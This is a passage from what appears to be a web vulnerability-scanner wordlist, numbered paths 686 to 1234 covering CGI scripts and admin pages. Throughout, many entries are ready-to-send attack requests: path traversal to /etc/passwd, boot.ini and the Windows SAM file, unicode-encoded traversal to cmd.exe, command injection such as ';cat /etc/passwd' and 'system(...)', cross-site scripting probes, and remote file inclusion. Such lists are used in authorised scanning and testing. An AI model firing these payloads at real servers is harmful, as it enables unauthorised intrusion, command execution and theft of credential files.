  686. caupo/admin/admin_workspace.php
  687. cbmc/forums.cgi
  688. cbms/cbmsfoot.php
  689. cbms/changepass.php
  690. cbms/editclient.php
  691. cbms/passgen.php
  692. cbms/realinv.php
  693. cbms/usersetup.php
  694. ccard/
  695. ccbill-local.cgi?cmd=MENU
  696. ccbill-local.pl?cmd=MENU
  697. ccbill/secure/ccbill.log
  698. ccbill/whereami.cgi
  699. cd-cgi/sscd_suncourier.pl
  700. cd/
  701. cdrom/
  702. cehttp/property/
  703. cehttp/trace
  704. cersvr.nsf
  705. cert/
  706. certa.nsf
  707. certificado/
  708. certificate
  709. certificates
  710. certlog.nsf
  711. certsrv.nsf
  712. certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
  713. certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
  714. cfcache.map
  715. cfdocs.map
  716. cfdocs/cfcache.map
  717. cfdocs/cfmlsyntaxcheck.cfm
  718. cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
  719. cfdocs/exampleapp/email/application.cfm
  720. cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
  721. cfdocs/exampleapp/publish/admin/addcontent.cfm
  722. cfdocs/exampleapp/publish/admin/application.cfm
  723. cfdocs/examples/httpclient/mainframeset.cfm
  724. cfdocs/expeval/displayopenedfile.cfm
  725. cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
  726. cfdocs/expeval/openfile.cfm
  727. cfdocs/expeval/sendmail.cfm
  728. cfdocs/snippets/evaluate.cfm
  729. cfdocs/snippets/fileexists.cfm
  730. cfdocs/snippets/gettempdirectory.cfm
  731. cfdocs/snippets/viewexample.cfm
  732. cfgwiz.exe
  733. cfide/Administrator/startstop.html
  734. cfide/administrator/index.cfm
  735. cgforum.cgi
  736. cgi-bin-sdb/printenv
  737. cgi-bin/
  738. cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
  739. cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
  740. cgi-bin/%2e%2e/abyss.conf
  741. cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
  742. cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
  743. cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
  744. cgi-bin/.access
  745. cgi-bin/.cobalt
  746. cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
  747. cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
  748. cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E
  749. cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
  750. cgi-bin/.fhp
  751. cgi-bin/.htaccess
  752. cgi-bin/.htaccess.old
  753. cgi-bin/.htaccess.save
  754. cgi-bin/.htaccess~
  755. cgi-bin/.htpasswd
  756. cgi-bin/.nsconfig
  757. cgi-bin/.passwd
  758. cgi-bin/.www_acl
  759. cgi-bin/.wwwacl
  760. cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
  761. cgi-bin//_vti_pvt/doctodep.btr
  762. cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
  763. cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
  764. cgi-bin/AT-admin.cgi
  765. cgi-bin/AT-generate.cgi
  766. cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
  767. cgi-bin/AnyBoard.cgi
  768. cgi-bin/AnyForm
  769. cgi-bin/AnyForm2
  770. cgi-bin/Backup/add-passwd.cgi
  771. cgi-bin/CGImail.exe
  772. cgi-bin/CSMailto.cgi
  773. cgi-bin/CSMailto/CSMailto.cgi
  774. cgi-bin/Cgitest.exe
  775. cgi-bin/Count.cgi
  776. cgi-bin/DCFORMS98.CGI
  777. cgi-bin/DCShop/auth_data/auth_user_file.txt
  778. cgi-bin/DCShop/orders/orders.txt
  779. cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
  780. cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
  781. cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
  782. cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
  783. cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
  784. cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
  785. cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
  786. cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
  787. cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
  788. cgi-bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script>
  789. cgi-bin/GW5/GWWEB.EXE
  790. cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
  791. cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
  792. cgi-bin/GWWEB.EXE?HELP=bad-request
  793. cgi-bin/ImageFolio/admin/admin.cgi
  794. cgi-bin/MachineInfo
  795. cgi-bin/MsmMask.exe
  796. cgi-bin/MsmMask.exe?mask=/junk334
  797. cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
  798. cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
  799. cgi-bin/Pbcgi.exe
  800. cgi-bin/SGB_DIR/superguestconfig
  801. cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
  802. cgi-bin/Upload.pl
  803. cgi-bin/VsSetCookie.exe?
  804. cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
  805. cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\
  806. cgi-bin/WS_FTP.ini
  807. cgi-bin/Webnews.exe
  808. cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
  809. cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
  810. cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
  811. cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
  812. cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
  813. cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
  814. cgi-bin/add_ftp.cgi
  815. cgi-bin/addbanner.cgi
  816. cgi-bin/adduser.cgi
  817. cgi-bin/admin.cgi
  818. cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
  819. cgi-bin/admin.php
  820. cgi-bin/admin.php3
  821. cgi-bin/admin.pl
  822. cgi-bin/admin/admin.cgi
  823. cgi-bin/admin/setup.cgi
  824. cgi-bin/adminhot.cgi
  825. cgi-bin/adminwww.cgi
  826. cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
  827. cgi-bin/aglimpse
  828. cgi-bin/aglimpse.cgi
  829. cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
  830. cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
  831. cgi-bin/amadmin.pl
  832. cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
  833. cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
  834. cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
  835. cgi-bin/anyboard.cgi
  836. cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
  837. cgi-bin/archie
  838. cgi-bin/architext_query.cgi
  839. cgi-bin/architext_query.pl
  840. cgi-bin/ash
  841. cgi-bin/astrocam.cgi
  842. cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
  843. cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
  844. cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
  845. cgi-bin/auctiondeluxe/auction.pl
  846. cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
  847. cgi-bin/auth_data/auth_user_file.txt
  848. cgi-bin/awl/auctionweaver.pl
  849. cgi-bin/awstats.pl
  850. cgi-bin/awstats/awstats.pl
  851. cgi-bin/ax-admin.cgi
  852. cgi-bin/ax.cgi
  853. cgi-bin/axs.cgi
  854. cgi-bin/badmin.cgi
  855. cgi-bin/banner.cgi
  856. cgi-bin/bannereditor.cgi
  857. cgi-bin/bash
  858. cgi-bin/bb-ack.sh
  859. cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
  860. cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
  861. cgi-bin/bb-histlog.sh
  862. cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
  863. cgi-bin/bb-rep.sh
  864. cgi-bin/bb-replog.sh
  865. cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
  866. cgi-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
  867. cgi-bin/bbs_forum.cgi
  868. cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;
  869. cgi-bin/bigconf.cgi
  870. cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
  871. cgi-bin/bizdb1-search.cgi
  872. cgi-bin/blog/
  873. cgi-bin/blog/mt-check.cgi
  874. cgi-bin/blog/mt-load.cgi
  875. cgi-bin/blog/mt.cfg
  876. cgi-bin/bnbform
  877. cgi-bin/bnbform.cgi
  878. cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  879. cgi-bin/boozt/admin/index.cgi?section=5&input=1
  880. cgi-bin/bsguest.cgi?email=x;ls
  881. cgi-bin/bslist.cgi?email=x;ls
  882. cgi-bin/build.cgi
  883. cgi-bin/bulk/bulk.cgi
  884. cgi-bin/c32web.exe/ChangeAdminPassword
  885. cgi-bin/c_download.cgi
  886. cgi-bin/cached_feed.cgi
  887. cgi-bin/cachemgr.cgi
  888. cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
  889. cgi-bin/calendar
  890. cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
  891. cgi-bin/calendar.pl
  892. cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
  893. cgi-bin/calendar/index.cgi
  894. cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
  895. cgi-bin/calender_admin.pl
  896. cgi-bin/campas?%0acat%0a/etc/passwd%0a
  897. cgi-bin/cart.pl
  898. cgi-bin/cart.pl?db='
  899. cgi-bin/cartmanager.cgi
  900. cgi-bin/cbmc/forums.cgi
  901. cgi-bin/ccbill-local.cgi?cmd=MENU
  902. cgi-bin/ccbill-local.pl?cmd=MENU
  903. cgi-bin/cfgwiz.exe
  904. cgi-bin/cgforum.cgi
  905. cgi-bin/cgi-lib.pl
  906. cgi-bin/cgi-test.exe
  907. cgi-bin/cgi_process
  908. cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
  909. cgi-bin/cgicso?query=AAA
  910. cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
  911. cgi-bin/cgimail.exe
  912. cgi-bin/cgitest.exe
  913. cgi-bin/cgiwrap
  914. cgi-bin/cgiwrap/%3Cfont%20color=red%3E
  915. cgi-bin/cgiwrap/~@USERS
  916. cgi-bin/cgiwrap/~JUNK(5)
  917. cgi-bin/cgiwrap/~root
  918. cgi-bin/change-your-password.pl
  919. cgi-bin/classifieds
  920. cgi-bin/classifieds.cgi
  921. cgi-bin/classifieds/classifieds.cgi
  922. cgi-bin/classifieds/index.cgi
  923. cgi-bin/clickcount.pl?view=test
  924. cgi-bin/clickresponder.pl
  925. cgi-bin/cmd.exe?/c+dir
  926. cgi-bin/cmd1.exe?/c+dir
  927. cgi-bin/code.php
  928. cgi-bin/code.php3
  929. cgi-bin/com5...................................................................................................................................................................................................
  930. cgi-bin/com5.java
  931. cgi-bin/com5.pl
  932. cgi-bin/commandit.cgi
  933. cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
  934. cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
  935. cgi-bin/common/listrec.pl
  936. cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
  937. cgi-bin/compatible.cgi
  938. cgi-bin/contents.htm
  939. cgi-bin/count.cgi
  940. cgi-bin/counter-ord
  941. cgi-bin/counterbanner
  942. cgi-bin/counterbanner-ord
  943. cgi-bin/counterfiglet-ord
  944. cgi-bin/counterfiglet/nc/
  945. cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
  946. cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
  947. cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
  948. cgi-bin/csNews.cgi
  949. cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
  950. cgi-bin/csPassword.cgi
  951. cgi-bin/csPassword/csPassword.cgi
  952. cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
  953. cgi-bin/csh
  954. cgi-bin/cstat.pl
  955. cgi-bin/cutecast/members/
  956. cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
  957. cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
  958. cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
  959. cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
  960. cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
  961. cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
  962. cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
  963. cgi-bin/dasp/fm_shell.asp
  964. cgi-bin/data/fetch.php?page=
  965. cgi-bin/date
  966. cgi-bin/day5datacopier.cgi
  967. cgi-bin/day5datanotifier.cgi
  968. cgi-bin/db2www/library/document.d2w/show
  969. cgi-bin/db4web_c/dbdirname//etc/passwd
  970. cgi-bin/db_manager.cgi
  971. cgi-bin/dbman/db.cgi?db=no-db
  972. cgi-bin/dbmlparser.exe
  973. cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
  974. cgi-bin/dcshop/auth_data/auth_user_file.txt
  975. cgi-bin/dcshop/orders/orders.txt
  976. cgi-bin/dfire.cgi
  977. cgi-bin/diagnose.cgi
  978. cgi-bin/dig.cgi
  979. cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
  980. cgi-bin/displayTC.pl
  981. cgi-bin/dnewsweb
  982. cgi-bin/donothing
  983. cgi-bin/dose.pl?daily&somefile.txt&|ls|
  984. cgi-bin/dumpenv.pl
  985. cgi-bin/echo.bat
  986. cgi-bin/echo.bat?&dir+c:\
  987. cgi-bin/edit.pl
  988. cgi-bin/empower?DB=whateverwhatever
  989. cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
  990. cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
  991. cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
  992. cgi-bin/enter.cgi
  993. cgi-bin/environ.cgi
  994. cgi-bin/environ.pl
  995. cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script>
  996. cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
  997. cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
  998. cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
  999. cgi-bin/ex-logger.pl
  1000. cgi-bin/excite
  1001. cgi-bin/excite;IFS=\"$\";/bin/cat
  1002. cgi-bin/ezadmin.cgi
  1003. cgi-bin/ezboard.cgi
  1004. cgi-bin/ezman.cgi
  1005. cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
  1006. cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
  1007. cgi-bin/ezshopper2/loadpage.cgi
  1008. cgi-bin/ezshopper3/loadpage.cgi
  1009. cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
  1010. cgi-bin/faxsurvey?cat%20/etc/passwd
  1011. cgi-bin/filemail
  1012. cgi-bin/filemail.pl
  1013. cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
  1014. cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
  1015. cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
  1016. cgi-bin/formmail.pl
  1017. cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
  1018. cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
  1019. cgi-bin/fortune
  1020. cgi-bin/foxweb.dll
  1021. cgi-bin/foxweb.exe
  1022. cgi-bin/fpadmin.htm
  1023. cgi-bin/fpremadm.exe
  1024. cgi-bin/fpsrvadm.exe
  1025. cgi-bin/ftp.pl
  1026. cgi-bin/ftpsh
  1027. cgi-bin/gH.cgi
  1028. cgi-bin/gbadmin.cgi?action=change_adminpass
  1029. cgi-bin/gbadmin.cgi?action=change_automail
  1030. cgi-bin/gbadmin.cgi?action=colors
  1031. cgi-bin/gbadmin.cgi?action=setup
  1032. cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls
  1033. cgi-bin/gbpass.pl
  1034. cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
  1035. cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
  1036. cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
  1037. cgi-bin/getdoc.cgi
  1038. cgi-bin/gettransbitmap
  1039. cgi-bin/glimpse
  1040. cgi-bin/gm-cplog.cgi
  1041. cgi-bin/gm.cgi
  1042. cgi-bin/guestbook.cgi
  1043. cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
  1044. cgi-bin/guestbook.pl
  1045. cgi-bin/handler
  1046. cgi-bin/handler/netsonar;cat
  1047. cgi-bin/hello.bat?&dir+c:\
  1048. cgi-bin/hitview.cgi
  1049. cgi-bin/horde/test.php
  1050. cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
  1051. cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
  1052. cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
  1053. cgi-bin/htimage.exe
  1054. cgi-bin/htimage.exe/path/filename?2,2
  1055. cgi-bin/html2chtml.cgi
  1056. cgi-bin/html2wml.cgi
  1057. cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
  1058. cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
  1059. cgi-bin/htsearch?-c/nonexistant
  1060. cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
  1061. cgi-bin/htsearch?exclude=%60/etc/passwd%60
  1062. cgi-bin/ibill.pm
  1063. cgi-bin/icat
  1064. cgi-bin/if/admin/nph-build.cgi
  1065. cgi-bin/ikonboard/help.cgi?
  1066. cgi-bin/imageFolio.cgi
  1067. cgi-bin/imagefolio/admin/admin.cgi
  1068. cgi-bin/imagemap
  1069. cgi-bin/imagemap.exe
  1070. cgi-bin/include/new-visitor.inc.php
  1071. cgi-bin/index.js0x70
  1072. cgi-bin/index.pl
  1073. cgi-bin/info2www
  1074. cgi-bin/infosrch.cgi
  1075. cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
  1076. cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
  1077. cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
  1078. cgi-bin/ion-p?page=../../../../../etc/passwd
  1079. cgi-bin/jailshell
  1080. cgi-bin/jj
  1081. cgi-bin/journal.cgi?folder=journal.cgi%00
  1082. cgi-bin/ksh
  1083. cgi-bin/lastlines.cgi?process
  1084. cgi-bin/listrec.pl
  1085. cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
  1086. cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
  1087. cgi-bin/log-reader.cgi
  1088. cgi-bin/log/
  1089. cgi-bin/log/nether-log.pl?checkit
  1090. cgi-bin/login.cgi
  1091. cgi-bin/login.pl
  1092. cgi-bin/login.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
  1093. cgi-bin/logit.cgi
  1094. cgi-bin/logs.pl
  1095. cgi-bin/logs/
  1096. cgi-bin/logs/access_log
  1097. cgi-bin/logs/error_log
  1098. cgi-bin/lookwho.cgi
  1099. cgi-bin/ls
  1100. cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
  1101. cgi-bin/mail
  1102. cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
  1103. cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
  1104. cgi-bin/mailform.exe
  1105. cgi-bin/mailit.pl
  1106. cgi-bin/maillist.cgi
  1107. cgi-bin/maillist.pl
  1108. cgi-bin/mailnews.cgi
  1109. cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
  1110. cgi-bin/main_menu.pl
  1111. cgi-bin/majordomo.pl
  1112. cgi-bin/man.sh
  1113. cgi-bin/man2html
  1114. cgi-bin/mastergate/search.cgi?search=0&search_on=all
  1115. cgi-bin/meta.pl
  1116. cgi-bin/mgrqcgi
  1117. cgi-bin/mini_logger.cgi
  1118. cgi-bin/minimal.exe
  1119. cgi-bin/mkilog.exe
  1120. cgi-bin/mkplog.exe
  1121. cgi-bin/mmstdod.cgi
  1122. cgi-bin/moin.cgi?test
  1123. cgi-bin/mojo/mojo.cgi
  1124. cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
  1125. cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
  1126. cgi-bin/mrtg.cgi?cfg=blah
  1127. cgi-bin/ms_proxy_auth_query/
  1128. cgi-bin/mt-static/
  1129. cgi-bin/mt-static/mt-check.cgi
  1130. cgi-bin/mt-static/mt-load.cgi
  1131. cgi-bin/mt-static/mt.cfg
  1132. cgi-bin/mt/
  1133. cgi-bin/mt/mt-check.cgi
  1134. cgi-bin/mt/mt-load.cgi
  1135. cgi-bin/mt/mt.cfg
  1136. cgi-bin/multihtml.pl?multi=/etc/passwd%00html
  1137. cgi-bin/musicqueue.cgi
  1138. cgi-bin/myguestbook.cgi?action=view
  1139. cgi-bin/namazu.cgi
  1140. cgi-bin/nbmember.cgi?cmd=list_all_users
  1141. cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
  1142. cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
  1143. cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
  1144. cgi-bin/netpad.cgi
  1145. cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
  1146. cgi-bin/nimages.php
  1147. cgi-bin/nlog-smb.cgi
  1148. cgi-bin/nlog-smb.pl
  1149. cgi-bin/non-existent.pl
  1150. cgi-bin/noshell
  1151. cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
  1152. cgi-bin/nph-error.pl
  1153. cgi-bin/nph-exploitscanget.cgi
  1154. cgi-bin/nph-maillist.pl
  1155. cgi-bin/nph-publish
  1156. cgi-bin/nph-publish.cgi
  1157. cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
  1158. cgi-bin/nph-test-cgi
  1159. cgi-bin/ntitar.pl
  1160. cgi-bin/opendir.php?/etc/passwd
  1161. cgi-bin/orders/orders.txt
  1162. cgi-bin/pagelog.cgi
  1163. cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
  1164. cgi-bin/parse-file
  1165. cgi-bin/pass
  1166. cgi-bin/passwd
  1167. cgi-bin/passwd.txt
  1168. cgi-bin/password
  1169. cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
  1170. cgi-bin/perl
  1171. cgi-bin/perl.exe
  1172. cgi-bin/perl.exe?-v
  1173. cgi-bin/perl?-v
  1174. cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
  1175. cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
  1176. cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
  1177. cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd
  1178. cgi-bin/phf
  1179. cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
  1180. cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
  1181. cgi-bin/photo/
  1182. cgi-bin/photo/manage.cgi
  1183. cgi-bin/php-cgi
  1184. cgi-bin/php.cgi?/etc/passwd
  1185. cgi-bin/plusmail
  1186. cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
  1187. cgi-bin/pollssi.cgi
  1188. cgi-bin/post-query
  1189. cgi-bin/post16.exe
  1190. cgi-bin/post32.exe|dir%20c:\
  1191. cgi-bin/post_query
  1192. cgi-bin/postcards.cgi
  1193. cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
  1194. cgi-bin/ppdscgi.exe
  1195. cgi-bin/printenv
  1196. cgi-bin/printenv.tmp
  1197. cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
  1198. cgi-bin/processit.pl
  1199. cgi-bin/profile.cgi
  1200. cgi-bin/pu3.pl
  1201. cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
  1202. cgi-bin/query
  1203. cgi-bin/query?mss=%2e%2e/config
  1204. cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
  1205. cgi-bin/quikstore.cfg
  1206. cgi-bin/quizme.cgi
  1207. cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
  1208. cgi-bin/ratlog.cgi
  1209. cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
  1210. cgi-bin/redirect
  1211. cgi-bin/register.cgi
  1212. cgi-bin/replicator/webpage.cgi/
  1213. cgi-bin/responder.cgi
  1214. cgi-bin/retrieve_password.pl
  1215. cgi-bin/rguest.exe
  1216. cgi-bin/rightfax/fuwww.dll/?
  1217. cgi-bin/rksh
  1218. cgi-bin/rmp_query
  1219. cgi-bin/robadmin.cgi
  1220. cgi-bin/robpoll.cgi
  1221. cgi-bin/rpm_query
  1222. cgi-bin/rsh
  1223. cgi-bin/rtm.log
  1224. cgi-bin/rwcgi60
  1225. cgi-bin/rwcgi60/showenv
  1226. cgi-bin/rwwwshell.pl
  1227. cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
  1228. cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
  1229. cgi-bin/sbcgi/sitebuilder.cgi
  1230. cgi-bin/scoadminreg.cgi
  1231. cgi-bin/scripts/*%0a.pl
  1232. cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid
  1233. cgi-bin/search
  1234. cgi-bin/search.cgi
